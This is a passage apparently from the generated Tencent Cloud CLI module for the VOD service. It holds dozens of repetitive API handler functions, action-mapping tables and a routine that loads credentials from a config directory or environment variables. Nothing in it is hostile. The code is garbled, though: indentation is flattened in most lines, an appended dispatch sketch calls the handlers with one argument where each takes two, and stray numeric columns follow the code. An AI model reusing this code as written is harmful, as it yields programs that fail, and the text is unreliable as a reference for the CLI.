endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CommitUploadRequest()
model.from_json_string(json.dumps(args))
rsp = client.CommitUpload(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyAIRecognitionTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyAIRecognitionTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyAIRecognitionTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyAdaptiveDynamicStreamingTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyAdaptiveDynamicStreamingTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyAdaptiveDynamicStreamingTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSearchMedia(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SearchMediaRequest()
model.from_json_string(json.dumps(args))
rsp = client.SearchMedia(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteWatermarkTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteWatermarkTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteWatermarkTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeletePersonSample(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeletePersonSampleRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeletePersonSample(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateAnimatedGraphicsTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateAnimatedGraphicsTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateAnimatedGraphicsTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyAnimatedGraphicsTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyAnimatedGraphicsTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyAnimatedGraphicsTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doAttachMediaSubtitles(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.AttachMediaSubtitlesRequest()
model.from_json_string(json.dumps(args))
rsp = client.AttachMediaSubtitles(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyMediaInfo(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyMediaInfoRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyMediaInfo(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteSampleSnapshotTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteSampleSnapshotTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteSampleSnapshotTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doWeChatMiniProgramPublish(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.WeChatMiniProgramPublishRequest()
model.from_json_string(json.dumps(args))
rsp = client.WeChatMiniProgramPublish(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSimpleHlsClip(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SimpleHlsClipRequest()
model.from_json_string(json.dumps(args))
rsp = client.SimpleHlsClip(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreatePersonSample(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreatePersonSampleRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreatePersonSample(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifySubAppIdStatus(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifySubAppIdStatusRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifySubAppIdStatus(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyContentReviewTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyContentReviewTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyContentReviewTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doProcessMedia(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ProcessMediaRequest()
model.from_json_string(json.dumps(args))
rsp = client.ProcessMedia(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateAIRecognitionTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateAIRecognitionTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateAIRecognitionTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeDailyPlayStatFileList(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeDailyPlayStatFileListRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeDailyPlayStatFileList(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteImageSpriteTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteImageSpriteTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteImageSpriteTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
"v20180717": vod_client_v20180717,
}
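# Supported API version -> generated request/response model module.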
MODELS_MAP = {
"v20180717": models_v20180717,
}
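# CLI action name -> handler function; keys correspond to VOD API actions.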
ACTION_MAP = {
"CreateSnapshotByTimeOffsetTemplate": doCreateSnapshotByTimeOffsetTemplate,
"EditMedia": doEditMedia,
"DescribeVodDomains": doDescribeVodDomains,
"ApplyUpload": doApplyUpload,
"DeleteAnimatedGraphicsTemplate": doDeleteAnimatedGraphicsTemplate,
"DescribeAIAnalysisTemplates": doDescribeAIAnalysisTemplates,
"PullEvents": doPullEvents,
"ProcessMediaByProcedure": doProcessMediaByProcedure,
"DeleteTranscodeTemplate": doDeleteTranscodeTemplate,
"DescribeTaskDetail": doDescribeTaskDetail,
"DescribeReviewDetails": doDescribeReviewDetails,
"DescribeWordSamples": doDescribeWordSamples,
"DescribeStorageData": doDescribeStorageData,
"ModifyAIAnalysisTemplate": doModifyAIAnalysisTemplate,
"DeleteProcedureTemplate": doDeleteProcedureTemplate,
"DeleteAdaptiveDynamicStreamingTemplate": doDeleteAdaptiveDynamicStreamingTemplate,
"CreateAdaptiveDynamicStreamingTemplate": doCreateAdaptiveDynamicStreamingTemplate,
"DescribeSampleSnapshotTemplates": doDescribeSampleSnapshotTemplates,
"DeleteSnapshotByTimeOffsetTemplate": doDeleteSnapshotByTimeOffsetTemplate,
"DescribeCdnLogs": doDescribeCdnLogs,
"ModifyClass": doModifyClass,
"DescribeTasks": doDescribeTasks,
"ResetProcedureTemplate": doResetProcedureTemplate,
"DescribeCDNUsageData": doDescribeCDNUsageData,
"CreateTranscodeTemplate": doCreateTranscodeTemplate,
"DescribeCDNStatDetails": doDescribeCDNStatDetails,
"ModifyImageSpriteTemplate": doModifyImageSpriteTemplate,
"DeleteClass": doDeleteClass,
"ExecuteFunction": doExecuteFunction,
"DeleteVodDomain": doDeleteVodDomain,
"DescribeMediaProcessUsageData": doDescribeMediaProcessUsageData,
"ConfirmEvents": doConfirmEvents,
"ComposeMedia": doComposeMedia,
"CreateContentReviewTemplate": doCreateContentReviewTemplate,
"CreateSampleSnapshotTemplate": doCreateSampleSnapshotTemplate,
"DeleteAIAnalysisTemplate": doDeleteAIAnalysisTemplate,
"DescribeMediaInfos": doDescribeMediaInfos,
"LiveRealTimeClip": doLiveRealTimeClip,
"PullUpload": doPullUpload,
"ModifySampleSnapshotTemplate": doModifySampleSnapshotTemplate,
"ModifyVodDomainAccelerateConfig": doModifyVodDomainAccelerateConfig,
"DeleteSuperPlayerConfig": doDeleteSuperPlayerConfig,
"DescribeProcedureTemplates": doDescribeProcedureTemplates,
"DescribeTranscodeTemplates": doDescribeTranscodeTemplates,
"ParseStreamingManifest": doParseStreamingManifest,
"CreateProcedureTemplate": doCreateProcedureTemplate,
"PushUrlCache": doPushUrlCache,
"DeleteMedia": doDeleteMedia,
"CreateSuperPlayerConfig": doCreateSuperPlayerConfig,
"ModifyPersonSample": doModifyPersonSample,
"DeleteContentReviewTemplate": doDeleteContentReviewTemplate,
"CreateAIAnalysisTemplate": doCreateAIAnalysisTemplate,
"ModifyVodDomainConfig": doModifyVodDomainConfig,
"DescribeSnapshotByTimeOffsetTemplates": doDescribeSnapshotByTimeOffsetTemplates,
"ProcessMediaByUrl": doProcessMediaByUrl,
"ModifyTranscodeTemplate": doModifyTranscodeTemplate,
"DescribeContentReviewTemplates": doDescribeContentReviewTemplates,
"ModifyWatermarkTemplate": doModifyWatermarkTemplate,
"DescribeStorageDetails": doDescribeStorageDetails,
"DeleteWordSamples": doDeleteWordSamples,
"CreateVodDomain": doCreateVodDomain,
"CreateImageSpriteTemplate": doCreateImageSpriteTemplate,
"DescribePersonSamples": doDescribePersonSamples,
"DeleteAIRecognitionTemplate": doDeleteAIRecognitionTemplate,
"CreateSubAppId": doCreateSubAppId,
"DescribeAnimatedGraphicsTemplates": doDescribeAnimatedGraphicsTemplates,
"ForbidMediaDistribution": doForbidMediaDistribution,
"ManageTask": doManageTask,
"ModifySnapshotByTimeOffsetTemplate": doModifySnapshotByTimeOffsetTemplate,
"ModifySuperPlayerConfig": doModifySuperPlayerConfig,
"CreateClass": doCreateClass,
"CreateWordSamples": doCreateWordSamples,
"ModifySubAppIdInfo": doModifySubAppIdInfo,
"DescribeAdaptiveDynamicStreamingTemplates": doDescribeAdaptiveDynamicStreamingTemplates,
"ModifyWordSample": doModifyWordSample,
"DescribeImageSpriteTemplates": doDescribeImageSpriteTemplates,
"DescribeAllClass": doDescribeAllClass,
"DescribeWatermarkTemplates": doDescribeWatermarkTemplates,
"CreateWatermarkTemplate": doCreateWatermarkTemplate,
"DescribeAIRecognitionTemplates": doDescribeAIRecognitionTemplates,
"DescribeSuperPlayerConfigs": doDescribeSuperPlayerConfigs,
"DescribeSubAppIds": doDescribeSubAppIds,
"CommitUpload": doCommitUpload,
"ModifyAIRecognitionTemplate": doModifyAIRecognitionTemplate,
"ModifyAdaptiveDynamicStreamingTemplate": doModifyAdaptiveDynamicStreamingTemplate,
"SearchMedia": doSearchMedia,
"DeleteWatermarkTemplate": doDeleteWatermarkTemplate,
"DeletePersonSample": doDeletePersonSample,
"CreateAnimatedGraphicsTemplate": doCreateAnimatedGraphicsTemplate,
"ModifyAnimatedGraphicsTemplate": doModifyAnimatedGraphicsTemplate,
"AttachMediaSubtitles": doAttachMediaSubtitles,
"ModifyMediaInfo": doModifyMediaInfo,
"DeleteSampleSnapshotTemplate": doDeleteSampleSnapshotTemplate,
"WeChatMiniProgramPublish": doWeChatMiniProgramPublish,
"SimpleHlsClip": doSimpleHlsClip,
"CreatePersonSample": doCreatePersonSample,
"ModifySubAppIdStatus": doModifySubAppIdStatus,
"ModifyContentReviewTemplate": doModifyContentReviewTemplate,
"ProcessMedia": doProcessMedia,
"CreateAIRecognitionTemplate": doCreateAIRecognitionTemplate,
"DescribeDailyPlayStatFileList": doDescribeDailyPlayStatFileList,
"DeleteImageSpriteTemplate": doDeleteImageSpriteTemplate,
}
AVAILABLE_VERSION_LIST = [
"v20180717",
]
def action_caller():
return ACTION_MAP
def parse_global_arg(parsed_globals):
g_param = parsed_globals
is_exist_profile = True
if not parsed_globals["profile"]:
is_exist_profile = False
g_param["profile"] = "default"
configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")
conf = {}
cred = {}
if is_conf_exist:
conf = Utils.load_json_msg(conf_path)
if is_cred_exist:
cred = Utils.load_json_msg(cred_path)
if not (isinstance(conf, dict) and isinstance(cred, dict)):
        raise ConfigurationError(
            "file: %s or %s is not valid JSON"
            % (g_param["profile"] + ".configure", g_param["profile"] + ".credential"))
if OptionsDefine.Token not in cred:
cred[OptionsDefine.Token] = None
    # No profile was given explicitly: fall back to credentials and region
    # from the environment.
    if not is_exist_profile:
if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY):
cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN)
if os.environ.get(OptionsDefine.ENV_REGION):
conf[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
for param in g_param.keys():
if g_param[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]:
if param in cred:
g_param[param] = cred[param]
else:
raise ConfigurationError("%s is invalid" % param)
elif param in [OptionsDefine.Region, OptionsDefine.Output]:
if param in conf:
g_param[param] = conf[param]
else:
raise ConfigurationError("%s is invalid" % param)
try:
if g_param[OptionsDefine.ServiceVersion]:
g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '')
else:
version = conf["vod"][OptionsDefine.Version]
g_param[OptionsDefine.Version] = "v" + version.replace('-', '')
if g_param[OptionsDefine.Endpoint] is None:
g_param[OptionsDefine.Endpoint] = conf["vod"][OptionsDefine.Endpoint]
except Exception as err:
        raise ConfigurationError("config file %s error: %s" % (conf_path, str(err)))
if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST:
raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
return g_param
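A minimal dispatch sketch, assuming parsed_globals already carries the keys that parse_global_arg() consumes (profile, region, output, filter and friends); the real CLI wires this up through its argument parser, so this is illustrative only:

def dispatch(action_name, parsed_globals):
    # Resolve the handler registered for this action and invoke it.
    handler = action_caller().get(action_name)
    if handler is None:
        raise Exception("unknown action: %s, available: %s"
                        % (action_name, " ".join(sorted(ACTION_MAP))))
    return handler(parsed_globals)

# e.g. dispatch("DescribeAllClass", parsed_globals)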
| 44.451907
| 105
| 0.733295
| 14,709
| 131,711
| 6.324495
| 0.029166
| 0.080106
| 0.230589
| 0.057854
| 0.848657
| 0.846754
